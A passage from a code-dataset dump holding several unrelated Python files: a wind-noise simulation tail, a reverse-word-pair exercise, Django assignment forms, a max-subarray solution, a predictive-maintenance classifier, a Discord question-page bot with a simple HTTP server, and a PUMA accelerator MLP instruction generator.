NORTH_CIRCLE):\n _set_line_to_gradient(data, y, NORTH_POLE, NORTH_CIRCLE, SOUTH, NORTH)\n for y in range(NORTH_CIRCLE, NORTH_TROPIC):\n _set_line_to_gradient(data, y, NORTH_CIRCLE, NORTH_TROPIC, NORTH, EAST)\n for y in range(NORTH_TROPIC, EQUATOR):\n _set_line_to_gradient(data, y, NORTH_TROPIC, EQUATOR, EAST, WEST)\n for y in range(EQUATOR, SOUTH_TROPIC):\n _set_line_to_gradient(data, y, EQUATOR, SOUTH_TROPIC, WEST, EAST)\n for y in range(SOUTH_TROPIC, SOUTH_CIRCLE):\n _set_line_to_gradient(data, y, SOUTH_TROPIC, SOUTH_CIRCLE, EAST, SOUTH)\n for y in range(SOUTH_CIRCLE, SOUTH_POLE):\n _set_line_to_gradient(data, y, SOUTH_CIRCLE, SOUTH_POLE, SOUTH, NORTH + 1.0)\n\n #\n # Generate noise\n #\n\n rng = numpy.random.RandomState(seed) # create our own random generator\n base = rng.randint(0, 4096)\n\n height = world.height\n width = world.width\n border = width / 4\n\n freq = self.frequency * self.octaves\n\n # This is a variable I am adding. 
It exists\n # so that worlds sharing a common seed but\n # different sizes will have similar patterns\n n_scale = 1024 / float(height)\n\n for y in range(height): # TODO: numpy\n for x in range(width):\n n = snoise2((x * n_scale) / freq, (y * n_scale) / freq, self.octaves, base=base)\n\n # Added to allow noise pattern to wrap around right and left.\n if x < border:\n n = (snoise2((x * n_scale) / freq, (y * n_scale) / freq, self.octaves, base=base) * x / border) + \\\n (snoise2(((x * n_scale) + width) / freq, (y * n_scale) / freq, self.octaves, base=base) * \\\n (border - x) / border)\n\n data[y, x] = _wrap(data[y, x] + n * distorsion_factor)\n\n return data\n","sub_path":"WorldEngine/worldengine/simulations/wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"152410976","text":"\"\"\"\nTwo words are a “reverse pair” if each is the reverse of the other. Write a program\nthat finds all the reverse pairs in the word list.\n\"\"\"\nimport bisect\nwith open(\"../c9/words.txt\") as fin:\n\tt=[i.strip() for i in fin]\n\tfor i in t:\n\t\tr=i[::-1]\n\t\ta=bisect.bisect_left(t,r)\n\t\tif a!=len(t) and t[a]==r:\n\t\t\tprint(a,i,r)\n","sub_path":"c10/e11.py","file_name":"e11.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"151981481","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom assignments.models import Assignment, Task, Problem\nfrom marks.services import MarkAPI\nfrom sheets.models import Sheet\nfrom utils.forms import FancyForm\n\n# Fields to show in forms\nFIELDS_TO_SHOW = ('name', 'grade_system', 'max_points')\n\n\n# Form for quick assignments/tasks/problems adding\nclass QuickAddForm(FancyForm, forms.Form):\n number_of_items = forms.IntegerField(max_value=50, min_value=1)\n\n\n# Basic form mixin for assignments/tasks/problems adding\nclass BaseAssignmentFormMixin(forms.BaseForm):\n def clean_max_points(self):\n max_points = self.cleaned_data['max_points']\n if max_points < 0:\n raise ValidationError(\"Use positive numbers\", code='invalid')\n if max_points > 1 and not max_points.is_integer():\n raise ValidationError(\"Use integer numbers for coefficient more than 1\", code='invalid')\n return max_points\n\n\n# Form for assignment adding\nclass AssignmentForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Assignment\n fields = FIELDS_TO_SHOW\n labels = {\n 'max_points': 'Max points/coefficient'\n }\n\n def save(self, commit=True, sheet=None):\n if sheet:\n self.instance.sheet = sheet\n super(AssignmentForm, self).save(commit)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for assignemnt\n MarkAPI.create_marks_for_assignment(self.instance, grade_system)\n return self.instance\n\n def __init__(self, *args, **kwargs):\n if 'sheet' in kwargs:\n self.sheet = kwargs.pop('sheet')\n if 'instance' in kwargs:\n self.instance = kwargs['instance']\n super(AssignmentForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'instance'):\n if self.instance.task_set.exists():\n self.fields.pop('grade_system')\n if self.instance.task_set.exists() or (\n hasattr(self,\n 'sheet') and self.sheet.overall_mark_system == Sheet.REGEX_SYSTEM):\n self.fields.pop('max_points')\n\n def clean_name(self):\n name = 
self.cleaned_data['name']\n if ((not hasattr(self, 'instance') or self.instance.name != name) and\n hasattr(self, 'sheet') and self.sheet.assignment_set.filter(name=name).exists()):\n raise ValidationError(\"There is assignment with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n\n\n# Form for task adding\nclass TaskForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Task\n fields = FIELDS_TO_SHOW\n\n def __init__(self, *args, **kwargs):\n if 'assignment' in kwargs:\n self.assignment = kwargs.pop('assignment')\n if 'instance' in kwargs:\n self.instance = kwargs['instance']\n super(TaskForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'instance'):\n if self.instance.problem_set.exists():\n self.fields.pop('grade_system')\n if self.instance.problem_set.exists() or (hasattr(self, 'assignment') and\n self.assignment.sheet.overall_mark_system == Sheet.REGEX_SYSTEM):\n self.fields.pop('max_points')\n\n def save(self, commit=True, assignment=None):\n if assignment:\n self.instance.assignment = assignment\n super(TaskForm, self).save(commit)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n if self.instance.assignment:\n MarkAPI.delete_mark_sets(self.instance.assignment)\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for task\n MarkAPI.create_marks_for_task(self.instance, grade_system)\n return self.instance\n\n def clean_name(self):\n name = self.cleaned_data['name']\n if ((not hasattr(self, 'instance') or self.instance.name != name) and\n hasattr(self, 'assignment') and self.assignment.task_set.filter(name=name).exists()):\n raise ValidationError(\"There is task with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n\n\n# Form for problem adding\nclass ProblemForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Problem\n fields = FIELDS_TO_SHOW\n\n def __init__(self, *args, **kwargs):\n if 'task' in kwargs:\n self.task = kwargs.pop('task')\n if 'instance' in kwargs:\n self.old_name = kwargs['instance'].name\n super(ProblemForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'task') and self.task.assignment.sheet.overall_mark_system == Sheet.REGEX_SYSTEM:\n self.fields.pop('max_points')\n\n def save(self, commit=True, task=None):\n if task:\n self.instance.task = task\n super(ProblemForm, self).save(commit)\n if task:\n task.problem_set.add(self.instance)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n if self.instance.task:\n MarkAPI.delete_mark_sets(self.instance.task)\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for problem\n MarkAPI.create_marks_for_problem(self.instance, grade_system)\n return self.instance\n\n def clean_name(self):\n name = self.cleaned_data['name']\n if ((not hasattr(self, 'old_name') or self.old_name != name) and\n hasattr(self, 'task') and self.task.problem_set.filter(name=name).exists()):\n raise ValidationError(\"There is problem with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n","sub_path":"assignments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"593559412","text":"import random\n\nclass Solution:\n def maxSubArray(self, nums):\n non_neg = [num for num in nums if num >= 0]\n if len(non_neg) == 0:\n return max(nums)\n\n # 
nums = self.group(nums)\n sub_res = 0\n res = 0\n for num in nums:\n sub_res = max(sub_res + num, 0)\n res = max(sub_res, res)\n return res\n\n # def sumTriple(self, nums):\n # if len(nums) == 3:\n # res = max(nums[0], nums[1], sum(nums))\n # if res == nums[0]:\n # return res, False\n # else:\n # return res, True\n # else:\n # prev, contious = self.sumTriple(nums[:-2])\n # if contious:\n # res = max(prev, nums[-1], prev + nums[-2] + nums[-1])\n # else:\n # res = max(prev, nums[-1])\n # if res == prev:\n # return res, False\n # else:\n # return res, True\n\n # def group(self, nums):\n # grouped = []\n # sub_res = nums[0]\n # factor = 1 if nums[0] >= 0 else -1\n # for num in nums[1:]:\n # if (num > 0 and factor > 0) or (num < 0 and factor < 0):\n # sub_res = sub_res + num\n # else:\n # grouped.append(sub_res)\n # sub_res = num\n # factor = factor * -1\n # else:\n # grouped.append(sub_res)\n # if grouped[0] < 0:\n # grouped = grouped[1:]\n # if grouped[-1] < 0:\n # grouped = grouped[:-1]\n # # print(grouped)\n # return grouped\n\n\n # def divide(self, nums, depth=0):\n # if len(nums) == 1:\n # return nums[0]\n # res = -1e5\n # print(depth)\n # for idx, num in enumerate(nums):\n # if num < 0:\n # if nums[idx - 1] + num < 0 or nums[idx + 1] + num < 0:\n # sum1 = sum(nums[:idx])\n # sum2 = sum(nums[idx+1:])\n # sub_res = max(self.divide(nums[:idx], depth+1), self.divide(nums[idx+1:], depth+1), sum1, sum2)\n # if sub_res > res:\n # res = sub_res\n # return res\n # print(sum1, nums1)\n # print(sum2, nums2)\n\n\n # return max(self.divide(nums1), self.divide(nums2), sum1, sum2)\n # if sum1 > sum2:\n # if len(nums1) == 1:\n # return sum1\n # return max(self.divide(nums1), sum1)\n # else:\n # if len(nums2) == 1:\n # return sum2\n # return max(self.divide(nums2), sum2)\n \n\nif __name__ == '__main__':\n sol = Solution()\n nums = [random.randint(-1000, 1000) for _ in range(50)]\n print(nums)\n print(sol.maxSubArray(nums))\n ","sub_path":"source code/53. Maximum Subarray.py","file_name":"53. Maximum Subarray.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"568026386","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import balanced_accuracy_score\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\nplt.style.use('bmh')\n\nCOLORS = list(mcolors.CSS4_COLORS.keys())\nSMALL_SIZE = 12\nMEDIUM_SIZE = 14\nLARGE_SIZE = 16\n\n## plot style, fonts and colors\nplt.style.use('seaborn')\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=LARGE_SIZE) # fontsize of the figure title\n\n\ndef load_data(pth, names=None, n_data_sets=4):\n\n print(\"... 
loading data\")\n if names is None:\n names = ['unit_nr', 'time', 'os_1', 'os_2', 'os_3']\n names += ['sensor_{0:02d}'.format(s + 1) for s in range(26)]\n\n dc = {}\n\n for i in range(n_data_sets):\n p = os.path.join(pth, 'RUL_FD00{}.txt'.format( i +1))\n df_RUL = pd.read_csv(p, sep= ' ', header=None, names=['RUL_actual'], index_col=False)\n p = os.path.join(pth, 'train_FD00{}.txt'.format( i +1))\n df_train = pd.read_csv(p, sep= ' ', header=None, names=names, index_col=False)\n p = os.path.join(pth, 'test_FD00{}.txt'.format( i +1))\n df_test = pd.read_csv(p, sep= ' ', header=None, names=names, index_col=False)\n s = 'FD_00{}'.format( i +1)\n dc[s] = {'df_RUL': df_RUL, 'df_train': df_train, 'df_test': df_test}\n\n\n return dc\n\ndef make_target(df, before_failure=10):\n \"\"\"\n For each time stamp we can calculate RUL by subtracting the it from the total_runtime\n both RUL and runtime will be appended to the df\n :param df:\n :param before_failure:\n :return:\n \"\"\"\n\n print(\"... making a needs maintenance target\")\n total_runtime = np.zeros(df.shape[0])\n for unit in df['unit_nr'].unique():\n unit_inds = np.where(df['unit_nr'].values == unit)[0]\n total_runtime[unit_inds] = df.iloc[unit_inds, :]['time'].max()\n df['total_runtime'] = total_runtime\n df['RUL'] = df['total_runtime'] - df['time']\n df['needs_maintenance'] = [1 if r < before_failure else 0 for r in df['RUL']]\n print(\"...... orig data shape {} x {}\".format(df.shape[0],df.shape[1]))\n\n return(df)\n\ndef munge_data(df, numeric_features, categorical_features):\n \"\"\"\n\n Deal with missing values then use specific numeric and categorical features to create a feature matrix X, and\n a target vector y.\n\n :param df:\n :param numeric_features:\n :param categorical_features:\n :return:\n \"\"\"\n\n print(\"... munging data\")\n X = df.copy()\n orig_cols = list(X.columns).copy()\n\n # drop columns with too many nans\n X.dropna(axis='columns', inplace=True, thresh=int(round(0.5*X.shape[0])))\n dropped_by_nan = list(set(orig_cols).difference(set(X.columns)))\n numeric_features = list(set(numeric_features).difference(dropped_by_nan))\n print(\"...... # columns dropped due to excessive NaNs: {}\".format(dropped_by_nan))\n\n # drop columns with very low variance\n dropped_by_variance = [f for f in numeric_features if X[f].values.var() < 0.0000001]\n X.drop(columns=dropped_by_variance, inplace=True)\n print(\"...... columns dropped based on variance: {}\".format(dropped_by_variance))\n numeric_features = list(set(numeric_features).difference(set(dropped_by_variance)))\n\n # create the feature matrix\n X = X[numeric_features + categorical_features]\n y = df['needs_maintenance'].copy()\n print(\"...... # of columns explicitly not used: {}\".format(df.shape[1] - X.shape[1]))\n print(\"...... 
feature matrix shape: {} x {}\".format(X.shape[0], X.shape[1]))\n return(X,y,numeric_features)\n\ndef plot_subset(df, unit_subset, features):\n \"\"\"\n Make a exploratory plot using specific units and specific features\n :param df:\n :param unit_subset:\n :param features:\n :return:\n \"\"\"\n\n subset_mask = [True if df['unit_nr'].values[i] in unit_subset else False for i in range(df.shape[0])]\n df_subset = df[subset_mask]\n\n fig, axs = plt.subplots(len(features), len(unit_subset), figsize=(16, 8), sharex=True, sharey=False)\n for f, feature in enumerate(features):\n for u, unit in enumerate(df_subset['unit_nr'].unique()):\n ax = axs[f, u]\n ax.set_facecolor('black')\n df_unit = df_subset[df_subset['unit_nr'] == unit]\n ax.plot(df_unit['time'], df_unit[feature], color=COLORS[f])\n ax.xaxis.set_major_locator(plt.MaxNLocator(3))\n\n if f == 0:\n ax.set_title(\"unit-{}\".format(unit))\n elif f == len(features)-1:\n ax.set_xlabel('Time')\n\n if u == 0:\n ax.set_ylabel(feature)\n else:\n ax.set_yticks([])\n\n ax.set_ylim((df_subset[feature].min(), df_subset[feature].max()))\n ax.set_xlim((df_subset['time'].min(), df_subset['time'].max()))\n\n plt.tight_layout()\n return(plt)\n\ndef get_preprocessor(numeric_features, categorical_features):\n \"\"\"\n return a sklearn pipeline transformer\n :param categorical_features:\n :param numeric_features:\n :return:\n \"\"\"\n\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n\n preprocessor = ColumnTransformer(transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\n return(preprocessor)\n\n\nif __name__ == '__main__':\n\n # load data\n print('loading data...')\n data_dir = os.path.join(\"..\", \"data\")\n all_data = load_data(data_dir)\n df = all_data['FD_001']['df_train'].copy()\n\n # make target\n df = make_target(df, before_failure=10)\n\n # munge data\n numeric_features = ['os_1', 'os_2', 'os_3'] + ['sensor_' + str(i).zfill(2) for i in range(2, 22)]\n categorical_features = ['unit_nr']\n X, y, numeric_features = munge_data(df, numeric_features, categorical_features)\n\n # EDA\n unit_subset = df['unit_nr'].unique()[:9]\n features = ['sensor_02', 'sensor_03', 'sensor_04', 'sensor_07', 'sensor_08']\n #plt = plot_subset(df, unit_subset, features)\n #plt.show()\n\n # model training\n print(\"... model training\")\n preprocessor = get_preprocessor(numeric_features, categorical_features)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y)\n\n target_names = [\"no_maintenance\", \"yes_maintenance\"]\n print(\"...... train\", sorted(Counter(y_train).items()))\n print(\"...... test\", sorted(Counter(y_test).items()))\n print(\"...... target names\", target_names)\n\n time_start = time.time()\n pipe = Pipeline(steps=[('preprocessor', preprocessor),\n ('sgd', SGDClassifier(class_weight='balanced'))])\n #\n param_grid = {'sgd__penalty': ['l2', 'l1', 'elasticnet'],\n 'sgd__loss': ['hinge', 'log', 'modified_huber', 'squared_hinge', 'perceptron']\n }\n\n grid = GridSearchCV(pipe, param_grid=param_grid, cv=5, n_jobs=-1)\n grid.fit(X_train, y_train)\n y_pred = grid.predict(X_test)\n\n ## model results\n print(\"... model results\")\n print(\"...... 
train time\", time.strftime('%H:%M:%S', time.gmtime(time.time() - time_start)))\n print(\"...... best parameters: \", grid.best_params_)\n print(\"...... model score: %.3f\" % balanced_accuracy_score(y_test, y_pred))\n print('done')\n\n\n","sub_path":"notebooks/mflib.py","file_name":"mflib.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"356784564","text":"from constants import Constants\r\nimport os\r\nimport threading\r\nimport http.server\r\nimport socketserver\r\nimport json\r\nimport traceback\r\n\r\npath = os.path.dirname(os.path.abspath(__file__))\r\nwith open(\"config.txt\") as f:\r\n\tlines = f.readlines()\r\n\tbaseurl = lines[1].strip()\r\n\tPORT = int(lines[2].strip())\r\n\r\ndef escape(msg):\r\n\tif type(msg) == str:\r\n\t\treturn msg.replace(\r\n\t\t\t\"\\\"\",\"\\\\\\\"\"\r\n\t\t).replace(\r\n\t\t\t\"\\'\",\"\\\\\\'\"\r\n\t\t).replace(\r\n\t\t\t\"`\",\"\\\\`\"\r\n\t\t).replace(\r\n\t\t\t\"<\",\"<\"\r\n\t\t).replace(\r\n\t\t\t\">\",\">\"\r\n\t\t)\r\n\treturn msg\r\n\r\ndef serverproc():\r\n\tos.chdir(os.path.join(path,\"serverfiles\"))\r\n\tHandler = http.server.SimpleHTTPRequestHandler\r\n\r\n\tdef do_POST(self):\r\n\t\tdata = self.rfile.read(int(self.headers['Content-Length']))\r\n\t\tif type(data) == bytes:\r\n\t\t\tdata = data.decode(\"utf-8\")\r\n\r\n\t\ttry:\r\n\t\t\tjsondata = json.loads(data)\r\n\r\n\t\t\tprint(\"POST\")\r\n\r\n\t\t\twith open(os.path.join(path,\"serverfiles\",\"questions.json\")) as f:\r\n\t\t\t\tcurrentjson = json.load(f)\r\n\r\n\t\t\tselected = list(filter(lambda i:i[\"selected\"], jsondata[\"messages\"]))\r\n\r\n\t\t\tif len(selected) > 0:\r\n\t\t\t\tcurrentjson.append({\r\n\t\t\t\t\t\"questions\":selected,\r\n\t\t\t\t\t\"channel\":selected[0][\"channelname\"],\r\n\t\t\t\t\t\"name\":jsondata[\"name\"],\r\n\t\t\t\t\t\"qid\":selected[0][\"qid\"]\r\n\t\t\t\t})\r\n\r\n\t\t\t\twith open(os.path.join(path,\"serverfiles\",\"questions.json\"), \"w\") as f:\r\n\t\t\t\t\tjson.dump(currentjson,f,indent=2)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\t\t\tself.send_response(200)\r\n\t\t\tself.send_header('Content-type', 'application/json; charset=UTF-8')\r\n\t\t\tself.end_headers()\r\n\r\n\t\t\tself.wfile.write(json.dumps({\r\n\t\t\t\t\"location\":'index.html'.format(baseurl)\r\n\t\t\t}).encode(\"utf-8\"))\r\n\t\t\treturn\r\n\r\n\t\texcept Exception as e:\r\n\t\t\ttraceback.print_exc()\r\n\r\n\t\t\tself.send_response(200)\r\n\t\t\tself.send_header('Content-type', 'application/json; charset=UTF-8')\r\n\t\t\tself.end_headers()\r\n\r\n\t\t\tself.wfile.write(json.dumps({\r\n\t\t\t\t\"location\":'error.html'.format(baseurl)\r\n\t\t\t}).encode(\"utf-8\"))\r\n\r\n\t\t\treturn\r\n\r\n\r\n\tHandler.do_POST = do_POST\r\n\r\n\thttpd = socketserver.TCPServer((\"\", PORT), Handler)\r\n\tprint(\"serving at port\", PORT)\r\n\thttpd.serve_forever()\r\n\r\ndef init():\r\n\tthreading.Thread(target=serverproc,daemon=True).start()\r\n\ttry:\r\n\t\tfor i in os.listdir(os.path.join(path,\"serverfiles\",\"questions\")):\r\n\t\t\tprint(\"removing {}\".format(i))\r\n\t\t\tif os.path.isfile(os.path.join(path,\"serverfiles\",\"questions\",i)):\r\n\t\t\t\tos.remove(os.path.join(path,\"serverfiles\",\"questions\",i))\r\n\texcept FileNotFoundError:\r\n\t\tos.mkdir(os.path.join(path,\"serverfiles\",\"questions\"))\r\n\r\n\r\nasync def onmessage(message):\r\n\r\n\tcontent = message.content.lower()\r\n\r\n\tif content.startswith(\".question\"):\r\n\t\t\twith 
open(os.path.join(path,\"serverfiles\",\"template.html\")) as f:\r\n\t\t\t\ttemplate = f.read()\r\n\r\n\t\t\tquestionnumber = Constants.questioncounter\r\n\t\t\tConstants.questioncounter += 1\r\n\r\n\t\t\tif message.channel.id in Constants.last50msgs:\r\n\t\t\t\tnewfile = template.replace(\r\n\t\t\t\t\t\"XXXXXXXXXXXXXXXXXXXXX\",\r\n\t\t\t\t\t\",\".join((\r\n\t\t\t\t\t\t\t\"{\" + \"content:\\\"{}\\\",id:\\\"{}\\\",author:\\\"{}\\\",authorid:\\\"{}\\\",channelname:\\\"{}\\\",channelid:\\\"{}\\\",selected:false,qid:\\\"{}\\\"\".format(\r\n\t\t\t\t\t\t\t\tescape(i.content),\r\n\t\t\t\t\t\t\t\tescape(i.id),\r\n\t\t\t\t\t\t\t\tescape(i.author.name),\r\n\t\t\t\t\t\t\t\tescape(i.author.id),\r\n\t\t\t\t\t\t\t\tescape(message.channel.name),\r\n\t\t\t\t\t\t\t\tescape(message.channel.id),\r\n\t\t\t\t\t\t\t\tescape(questionnumber),\r\n\t\t\t\t\t\t\t) + \"}\"\r\n\t\t\t\t\t\t\tfor i in Constants.last50msgs[message.channel.id]\r\n\t\t\t\t\t\t))\r\n\t\t\t\t)\r\n\t\t\telse:\r\n\t\t\t\tnewfile = template.replace(\r\n\t\t\t\t\t\"XXXXXXXXXXXXXXXXXXXXX\",\"\"\r\n\t\t\t\t)\r\n\r\n\r\n\t\t\twith open(\r\n\t\t\t\tos.path.join(\r\n\t\t\t\t\tpath,\r\n\t\t\t\t\t\"serverfiles\",\r\n\t\t\t\t\t\"questions\",\r\n\t\t\t\t\t\"q\" + str(questionnumber) + \".html\"\r\n\t\t\t\t), \"w\") as f:\r\n\t\t\t\tf.write(newfile)\r\n\r\n\t\r\n\t\t\tawait Constants.client.send_message(\r\n\t\t\t\tmessage.channel,\r\n\t\t\t\t\"http://{}/questions/q{}.html\".format(\r\n\t\t\t\t\tbaseurl,\r\n\t\t\t\t\tstr(questionnumber)\r\n\t\t\t\t) + \"\\nhttp://{}/questions/q{}.html\".format(\r\n\t\t\t\t\t\"192.168.2.12:8800\",\r\n\t\t\t\t\tstr(questionnumber)\r\n\t\t\t\t)\r\n\t\t\t)\r\n\r\n\tif message.channel.id in Constants.last50msgs:\r\n\t\tConstants.last50msgs[message.channel.id].append(message)\r\n\t\twhile len(Constants.last50msgs[message.channel.id]) > 50:\r\n\t\t\tConstants.last50msgs[message.channel.id].pop(0)\r\n\telse:\r\n\t\tConstants.last50msgs[message.channel.id] = [message]\r\n","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"126225583","text":"## TESTING BACKPROP ON 3-LAYERED MLP\nimport sys\nimport os\nimport numpy as np\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, root_dir)\n\nfrom src.data_convert import *\nfrom src.instrn_proto import *\nfrom src.tile_instrn_proto import *\nimport include.config as cfg\n\npath = 'testasm/mlp_train_2layer_digital/' #path for weights, instruction and input for tile0\nnet = 'mlp_train_2layer_digital'\nwt_path =path + 'weights/'\ndatamem_off = cfg.datamem_off # each matrix has 6 memory spaces (1 for f/b, 2 for d)\nphy2log_ratio = cfg.phy2log_ratio # ratio of physical to logical xbar\ninst_refresh = 1\n\n\n## CREATE MEMRISTOR PROGRAMMING MATRICES\n# NOTE: weights programmed to xbars are stored in terms of their representative floating values\nxbar_size = cfg.xbar_size\nfor m in range(cfg.num_matrix):\n ## Create xbar weight files for programming for each matrix\n # scaling down weight values to ensure that output of MVM doesn't overflow\n log_xbar = 0.1*np.random.rand(xbar_size, xbar_size)\n phy_xbar = [np.random.rand(xbar_size, xbar_size) for i in range(phy2log_ratio)]\n xbar_size = cfg.xbar_size\n for i in range (xbar_size):\n for j in range (xbar_size):\n temp_val = float2fixed(log_xbar[i][j], cfg.int_bits, cfg.frac_bits)\n assert (len(temp_val) == 16)\n for k in range (len(phy_xbar)):\n if (k==0):\n val 
= temp_val[-(k+1)*cfg.xbar_bits:]\n else:\n val = temp_val[-(k+1)*cfg.xbar_bits:-(k+1)*cfg.xbar_bits+2]\n # augment sign extension (used in MSB xbar only)\n if (k == (len(phy_xbar)-1)):\n val = (cfg.num_bits - cfg.xbar_bits)*val[0] + val[0:]\n phy_xbar[k][i][j] = fixed2float(val, cfg.int_bits, cfg.frac_bits)\n\n # save log_xbar and phy_xbar to disc\n np.save (wt_path+'tile'+str(1)+'/core'+str(0)+'/mat'+str(m)+'-log_xbar', log_xbar)\n for i in range (len(phy_xbar)):\n np.save (wt_path+'tile'+str(1)+'/core'+str(0)+'/mat'+str(m)+'-phy_xbar'+str(i), phy_xbar[i])\n\n\n## CREATE INSTRUCTIONS FOR PROGRAMMMING PUMA\n# Create Tile0 instructions\ndict_list = []\n# Send input layer data to Tile1\ni_temp = i_send(mem_addr=0, vtile_id=0, send_width=16, target_addr=1, vec=8)\ndict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_halt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile0/tile_imem.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile0-IMA0 instructions\ndict_list = []\n# Add a halt instruction\ni_temp = i_hlt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile0/core_imem0.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile1 instructions\ndict_list = []\n# Receive input layer data from Tile0\ni_temp = i_receive(mem_addr=0, vtile_id=0, receive_width=16, counter=1, vec=8)\ndict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_halt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile1/tile_imem.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile1-IMA0 instructions\n# instructions for IMA1\ndict_list = []\n# Set load address (load indirect: tileMemory 0-127 holds input data)\ni_temp = i_set(d1=datamem_off+0, imm=0, vec=1)\ndict_list.append(i_temp.copy())\n\n# Set store address (store indirect: tileMemory 128-255 holds input data)\ni_temp = i_set(d1=datamem_off+1, imm=cfg.xbar_size, vec=1)\ndict_list.append(i_temp.copy())\n\n# Load data from tile memory to mat0-f-inMem (Matrix0: f-xbar: xbar_inMem)\ni_temp = i_load (0, datamem_off+0, load_width=16, vec=cfg.xbar_size/16)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to foward pass for layer 0 (MVMU0)\ni_temp = i_mvm(['100', '000'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer1-fw-pass (from mat0-f-outMem to mat1-f-inMem)\ni_temp = i_copy (6*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to foward pass for layer 1 (MVMU1)\ni_temp = i_mvm(['000', '100'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-fw-pass to enable layer1-bw-pass (from mat1-f-outMem to mat1-b-inMem)\ni_temp = i_copy (8*cfg.xbar_size, 7*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-fw-pass to enable layer1-acc (from mat1-f-outMem to mat1-d-outMem)\ni_temp = i_copy (11*cfg.xbar_size, 7*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer2-acc (from mat0-f-outMem to mat1-d-inMem)\ni_temp = i_copy (10*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to backward pass for layer 1 and acc for layer 1 (MVMU1)\ni_temp = i_mvm(['000', '011'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-bw-pass to enable layer0-acc (from mat1-b-outMem to mat0-d-outMem)\ni_temp = i_copy 
